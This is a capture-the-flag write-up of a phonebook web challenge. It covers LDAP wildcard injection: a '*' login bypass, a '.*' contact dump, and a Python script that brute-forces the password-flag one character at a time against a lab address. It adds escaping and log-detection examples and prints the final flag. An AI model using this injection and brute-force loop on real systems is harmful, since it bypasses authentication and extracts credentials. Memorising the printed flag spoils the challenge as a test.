Phonebook

Date: 13 May 2021

Author: Dhilip Sanjay S


Initial Recon

  • Initially I couldn't find the username and password for login. So, I was looking for some other endpoint than login.

  • I was able to find two other endpoints:

    • 964430b4cdd199af19b986eaf2193b21f32542d0

    • search

Access Denied

  • The 964430b4cdd199af19b986eaf2193b21f32542d0 page had a search box, which made a POST request to the search endpoint. But it kept returning an "Access Denied" 403 error message.

Dumping all the contacts in the phonebook

Login with wild card character (*)

  • On entering the wildcard character (*) as both the username and the password, I was able to log in to the site.
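
This is the behaviour you get when a login handler splices the submitted username and password straight into an LDAP search filter, where an unescaped * is a wildcard (the challenge backend itself is not shown, so that is an assumption). The following is an added example, not the challenge's code: it builds the filter both by plain concatenation and with RFC 4515 escaping, then evaluates each against a constructed directory using a simplified matcher. The attribute names uid and userPassword, the directory entries and the single-shape filter evaluator are all constructed for illustration.

```python
#!/usr/bin/env python3
"""LDAP filter injection: string-built filter vs. escaped filter.

Added example, not the challenge's own code. The attribute names (uid,
userPassword), the directory entries and the tiny filter evaluator are
constructed to show the behaviour; the real backend is not visible.
"""
import re

# RFC 4515 section 3: these characters must be hex-escaped inside an assertion
# value, otherwise the directory interprets them as filter syntax.
_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}

# Constructed directory. One entry deliberately has a literal '*' in its
# password to show that escaping keeps legitimate logins working.
DIRECTORY = [
    {"uid": "reese", "userPassword": "HTB{constructed_example_secret}"},
    {"uid": "star", "userPassword": "p*ss"},
]


def escape_filter_value(value):
    """Escape one untrusted value for use inside an LDAP filter."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def vulnerable_filter(username, password):
    """Plain concatenation: a submitted '*' becomes a wildcard."""
    return f"(&(uid={username})(userPassword={password}))"


def safe_filter(username, password):
    """Same filter, but each user-supplied value is escaped first."""
    return (f"(&(uid={escape_filter_value(username)})"
            f"(userPassword={escape_filter_value(password)}))")


def _unescape(piece):
    # \XX hex escapes stand for literal characters; restore them.
    return re.sub(r"\\([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), piece)


def assertion_matches(assertion, attribute_value):
    """Simplified RFC 4515 matching: an unescaped '*' is a wildcard, an escaped
    one is a literal asterisk. Case-sensitive, stricter than a real server."""
    parts = [_unescape(p) for p in assertion.split("*")]
    if len(parts) == 1:                      # equality match, no wildcard
        return parts[0] == attribute_value
    initial, *middle, final = parts          # substring match
    if not (attribute_value.startswith(initial) and attribute_value.endswith(final)):
        return False
    pos, end = len(initial), len(attribute_value) - len(final)
    for part in middle:
        idx = attribute_value.find(part, pos, end)
        if idx < 0:
            return False
        pos = idx + len(part)
    return pos <= end


_FILTER_RE = re.compile(r"^\(&\(uid=(.*)\)\(userPassword=(.*)\)\)$")


def login_allowed(ldap_filter, directory=DIRECTORY):
    """Evaluate the one filter shape used above against the constructed entries.
    Returns True when at least one entry satisfies both assertions."""
    m = _FILTER_RE.match(ldap_filter)
    if not m:
        return False
    uid_assert, pw_assert = m.groups()
    return any(assertion_matches(uid_assert, e["uid"])
               and assertion_matches(pw_assert, e["userPassword"]) for e in directory)


if __name__ == "__main__":
    for user, pw in [("*", "*"), ("*", "HTB{*}"), ("reese", "wrong"), ("star", "p*ss")]:
        print(f"{user!r:10} {pw!r:10} concatenated={login_allowed(vulnerable_filter(user, pw))!s:5} "
              f"escaped={login_allowed(safe_filter(user, pw))}")
```

With the concatenated filter, * as both values matches every entry and HTB{*} matches any password with that prefix; with the escaped filter both become literal strings and match nothing, while the user whose real password contains * still logs in. In production, python-ldap's ldap.filter.escape_filter_chars performs the same escaping; the point is that every user-supplied value goes through it before it reaches the filter.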

Search using regex (.*)

  • Now, in the search box, I tried the same wildcard character, but it didn't work.

  • So I used the regex .*, which matches any string, and got the following output:

Kyle Reese	[email protected]	555-1234567
Ellery Hun	[email protected]	317-959-9562
Madelaine Lush	[email protected]	636-918-1006
Currey Conti	[email protected]	529-673-3935
Chaim Smoth	[email protected]	895-974-4117
Eldin Jelf	[email protected]	363-426-3563
Ganny Marti	[email protected]	796-793-6925
Jobey Olley	[email protected]	607-345-0290
Katalin Wilde	[email protected]	414-839-2681
Stinky Trood	[email protected]	933-416-1003
Tab Zoren	[email protected]	360-678-3613
Ursula Beer	[email protected]	794-396-6882
Bryan Arman	[email protected]	640-255-8092
Babette Cunio	[email protected]	709-363-0223
Berget Novis	[email protected]	780-278-2572
Ced Engley	[email protected]	230-780-1999
Caryn Germon	[email protected]	967-789-6335
Devina Alcide	[email protected]	828-947-3484
Dionne Lammas	[email protected]	824-561-5676
Emmalynn Burnup	[email protected]	148-856-7052
Fredericka Hanks	[email protected]	762-337-5667
Hannah Inder	[email protected]	315-711-6454
Jay Sharma	[email protected]	893-382-5236
Lilyan Crepel	[email protected]	851-980-1038
Nevile Cogle	[email protected]	296-328-0254
Pansy Godier	[email protected]	126-853-7977
Rubetta Bernth	[email protected]	897-680-2856
Renelle Hyett	[email protected]	453-475-9693
Saul Haill	[email protected]	654-478-5757
Stephanus Massot	[email protected]	717-500-2025
Sarah Moyes	[email protected]	747-445-4381
Sig Tanby	[email protected]	212-473-4506
Shepherd Tunuy	[email protected]	293-455-5209
Teddy Bilby	[email protected]	357-669-5415
Taylor Capsey	[email protected]	118-956-5884
Teddie Redley	[email protected]	658-361-4791
Abagael Guidera	[email protected]	857-685-9711
Arv Teresse	[email protected]	916-453-1626
Bert Father	[email protected]	131-343-2704
Bart McNess	[email protected]	644-208-9958
Corinne Tirone	[email protected]	572-971-8847
Denny Ashmole	[email protected]	345-974-0984
Elenore Puttick	[email protected]	525-705-9780
Frederigo Itzkov	[email protected]	681-753-0881
Jessamyn Trusty	[email protected]	423-494-9425
Jamison Vigurs	[email protected]	161-478-7335
Michal Fearby	[email protected]	844-581-6099
Mellicent Pessolt	[email protected]	735-651-5726
Terencio Ducarne	[email protected]	831-135-9972
Trev Simmers	[email protected]	378-186-4422
Aubrey Castille	[email protected]	930-681-1706
Andria Gossage	[email protected]	184-389-0446
Ansell Shovlin	[email protected]	329-311-4183
Ahmed Swyndley	[email protected]	954-829-5270
Bay Gregori	[email protected]	791-721-1297
Charlie Prangle	[email protected]	869-131-2435
Dianna Chesser	[email protected]	901-185-5817
Denna Duplain	[email protected]	884-899-2850
Davidson Ibotson	[email protected]	709-535-0126
Enid Halbord	[email protected]	318-313-2200
Eimile Pantlin	[email protected]	690-650-9785
Fina Bonsale	[email protected]	631-592-3171
Ives Harvatt	[email protected]	606-103-7270
Jehanna Langmaid	[email protected]	171-550-7961
Karlee Christal	[email protected]	354-231-8489
Koo Hansill	[email protected]	114-439-3748
Kimberley Mourant	[email protected]	792-338-9852
Moll Linster	[email protected]	704-145-7925
Sabra Brumham	[email protected]	222-509-0396
Scottie Bucknell	[email protected]	765-181-5301
Stewart Currier	[email protected]	480-258-4237
Sollie Windham	[email protected]	554-620-3103
Veda Lalonde	[email protected]	788-911-3962
Aguie Baggaley	[email protected]	302-693-4223
April Roskelly	[email protected]	177-474-9382
Burtie Bitcheno	[email protected]	859-267-0856
Brunhilda Courtier	[email protected]	610-896-4215
Baxie Ellesmere	[email protected]	815-678-4391
Daryl Pond-Jones	[email protected]	807-353-1751
Elyse Puckring	[email protected]	619-569-7695
Glen Pickford	[email protected]	101-639-7455
Issi Coupland	[email protected]	943-625-5169
Joey Stienham	[email protected]	214-853-1445
Marylee Parbrook	[email protected]	872-906-8081
Reginauld Meggison	[email protected]	460-793-0851
Sybille Jephcott	[email protected]	454-950-9923
Siouxie Yesichev	[email protected]	215-132-7221
Diana Moncreiff	[email protected]	473-166-1352
Deane Shakelade	[email protected]	747-399-5336
Far Chansonne	[email protected]	215-579-4465
Ivett Danielczyk	[email protected]	777-574-2837
Johnette Vescovini	[email protected]	470-681-1859
Kary Thackeray	[email protected]	592-635-6851
Maris Giacopelo	[email protected]	721-232-8735
Pascal Ainscough	[email protected]	202-416-7489
Valeda Purselowe	[email protected]	407-245-6246
Allin de Glanville	[email protected]	885-440-5379
Marty Chellenham	[email protected]	713-864-5942
Oneida Della Scala	[email protected]	472-913-8907
Vale O' Concannon	[email protected]	547-901-0162
Xavier Semeradova	[email protected]	487-363-1619

  • But wait, where is the flag?

Finding the password/flag

  • We'll try to find the password. My intuition is that the password might be the flag.

  • We know that the wildcard character (*) lets us log in. So we can try adding characters before and after the wildcard.

  • So let's try * as the username and HTB{*} as the password, because this is the flag format for HTB challenges.

  • Now we are able to log in. This confirms that the password is the flag.

  • So we need a script to brute-force the flag one character at a time.

#!/usr/bin/env python3
import requests
import string

url = "http://138.68.182.108:30733/login"
leaked_pass = list("HTB{")

# Remove the wildcard character, otherwise every guess would match
printable = string.printable.replace('*', '')

while True:
    for character in printable:
        # Guess one more character, keep the trailing wildcard for the rest
        guess = ''.join(leaked_pass) + character + '*'
        print("Guessing " + guess)
        r = requests.post(url, data={"username": "*", "password": guess})
        # A successful login returns a different page than a failed one;
        # 2586 is the Content-Length observed for the successful response
        if r.headers['Content-Length'] == '2586':
            leaked_pass.append(character)
            break

    # End of the flag
    if leaked_pass[-1] == '}':
        print("Password: " + ''.join(leaked_pass))
        break
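
From the defender's side, a loop like the one above leaves a distinctive trail: a run of login attempts in quick succession from one address, every one of them with a filter metacharacter as the username, and "successful" logins scattered among the failures because the wildcard oracle answers yes for each correct guess. The following is an added example, not from the writeup, that runs two checks over constructed application auth-log lines; the log format, field names, addresses and thresholds are all assumptions to adapt to what your own login handler records (it must log the submitted username, the source address and the outcome, and never the password).

```python
#!/usr/bin/env python3
"""Spotting LDAP-injection probing in application auth logs.

Added example, not part of the original writeup. The log format, field names
and the sample lines below are constructed; adapt the parser to the fields
your login handler actually records.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r'^(?P<ts>\S+) login src=(?P<src>\S+) user="(?P<user>[^"]*)" result=(?P<result>\w+)$'
)
# RFC 4515 special characters: they only turn up in a username when someone
# is trying to shape the LDAP filter built from it.
LDAP_META = set("*()\\\x00")

# Constructed sample: the first seven lines mimic the writeup's loop (same
# wildcard username, one request per guess), the rest is ordinary traffic.
SAMPLE_LOG = """\
2021-05-13T10:00:00Z login src=10.0.0.5 user="*" result=success
2021-05-13T10:00:01Z login src=10.0.0.5 user="*" result=failure
2021-05-13T10:00:02Z login src=10.0.0.5 user="*" result=failure
2021-05-13T10:00:03Z login src=10.0.0.5 user="*" result=failure
2021-05-13T10:00:04Z login src=10.0.0.5 user="*" result=success
2021-05-13T10:00:05Z login src=10.0.0.5 user="*" result=failure
2021-05-13T10:00:06Z login src=10.0.0.5 user="*" result=failure
2021-05-13T10:00:12Z login src=192.0.2.7 user="reese" result=success
2021-05-13T10:00:13Z login src=198.51.100.4 user="kyle" result=failure
2021-05-13T10:00:14Z login src=198.51.100.4 user="(admin)" result=failure
"""


def parse_events(text):
    """Turn log lines into dicts; lines that do not fit the format are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ev = m.groupdict()
        ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(ev)
    return events


def metachar_usernames(events):
    """Sorted (src, user) pairs whose submitted username carries filter syntax."""
    hits = {(e["src"], e["user"]) for e in events if LDAP_META & set(e["user"])}
    return sorted(hits)


def login_bursts(events, threshold=5, window=timedelta(seconds=60)):
    """Sources with at least `threshold` login attempts inside any `window`.

    Successes count too: a wildcard oracle answers 'success' for every correct
    guess, so rate limiting that only counts failures undercounts it.
    """
    per_src = defaultdict(list)
    for e in events:
        per_src[e["src"]].append(e["ts"])
    bursts = {}
    for src, stamps in per_src.items():
        stamps.sort()
        j = peak = 0
        for i, t in enumerate(stamps):       # sliding window over sorted times
            while t - stamps[j] > window:
                j += 1
            peak = max(peak, i - j + 1)
        if peak >= threshold:
            bursts[src] = peak
    return bursts


def analyze(text):
    """Run both checks and return the findings as one dict."""
    events = parse_events(text)
    return {"metachar": metachar_usernames(events), "bursts": login_bursts(events)}


if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    for src, user in report["metachar"]:
        print(f"filter metacharacter in username from {src}: {user!r}")
    for src, n in report["bursts"].items():
        print(f"login burst from {src}: {n} attempts within 60s")
```

On the sample, 10.0.0.5 trips both checks (wildcard username, seven attempts in six seconds) and 198.51.100.4 trips only the metacharacter check; the metacharacter rule fires on a single request, so it catches the very first probe before any burst threshold is reached.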

Solution

  • We get the password/flag as: HTB{d1rectory_h4xx0r_is_k00l}
